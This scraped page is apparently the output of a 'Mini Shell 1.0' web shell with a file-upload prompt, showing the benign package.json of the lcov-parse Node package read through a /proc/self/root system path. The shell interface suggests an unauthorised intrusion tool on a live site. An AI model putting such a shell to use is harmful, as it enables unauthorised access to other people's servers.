HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/self/root/usr/share/node_modules/lcov-parse/
Upload File :
Current File : //proc/self/root/usr/share/node_modules/lcov-parse/package.json
{
  "name": "lcov-parse",
  "description": "Parse lcov results files and return JSON",
  "version": "1.0.0",
  "author": "Dav Glass <davglass@gmail.com>",
  "contributors": [
    "Alan Gutierrez <alan@prettyrobots.com>",
    "Gerard Escalante <gerard@saygo.ca>",
    "Daniel Howe <dhowe@swipeclock.com>"
  ],
  "bin": {
    "lcov-parse": "./bin/cli.js"
  },
  "bugs": {
    "url": "http://github.com/davglass/lcov-parse/issues"
  },
  "main": "./lib/index",
  "tags": [
    "lcov",
    "json",
    "coverage",
    "parser"
  ],
  "devDependencies": {
    "istanbul": "^0.2.10",
    "jshint": "^2.5.1",
    "vows": "*",
    "yui-lint": "~0.1.1"
  },
  "scripts": {
    "pretest": "jshint --config ./node_modules/yui-lint/jshint.json ./lib/",
    "test": "istanbul cover --print both ./node_modules/vows/bin/vows -- --spec ./tests/*.js"
  },
  "license": "BSD-3-Clause",
  "repository": {
    "type": "git",
    "url": "http://github.com/davglass/lcov-parse.git"
  }
}